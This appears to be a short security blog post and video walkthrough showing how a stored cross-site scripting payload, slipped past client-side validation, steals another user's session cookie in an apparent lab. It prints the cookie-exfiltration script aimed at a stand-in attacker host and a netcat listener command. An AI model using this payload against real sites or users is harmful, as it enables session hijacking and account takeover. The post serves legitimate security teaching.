<p>In this video we exploit client side input validation to steal another user’s cookie. This is a fairly standard and straightforward action. The first time I saw this in action was during a SANS course, I honestly forget which one. It doesn’t really come up very often in online CTFs but might be handy to have in your backpocket.</p>
<div class=“embed-responsive embed-responsive-16by9” > <iframe src=“https://www.youtube.com/embed/WBMiVS3FXaE” class=“embed-responsive-item” allowfullscreen=“allowfullscreen”></iframe> </div> </p>
<p>Once we have identified our opportunity to bypass their filter (@37 seconds) we fire up BURP (proxy mode) and post the actual data we want to be stored on the server. In this case, a javascript image call with the users’ cookie to a netcat listener on our evil box.</p>
<pre class=“prettyprint linenums”><script>new Image().src=“http://EVIL.IP.AD.DY/gotcha.php?cookie=”+document.cookie;</script></pre> <p>After we’ve got our evil javascript stored on the server, along comes the victim (chromium browser) who views the page with the our evil javascript and shoots his cookies to our netcat listener.
<pre class=“prettyprint linenums”>nc -lnvp 80</pre>
<p>Once we’ve got his cookies, we just edit our own, pasting in the victims’ cookie info and bam, we went from being ‘hacker10’ to ‘hacker20’.</p>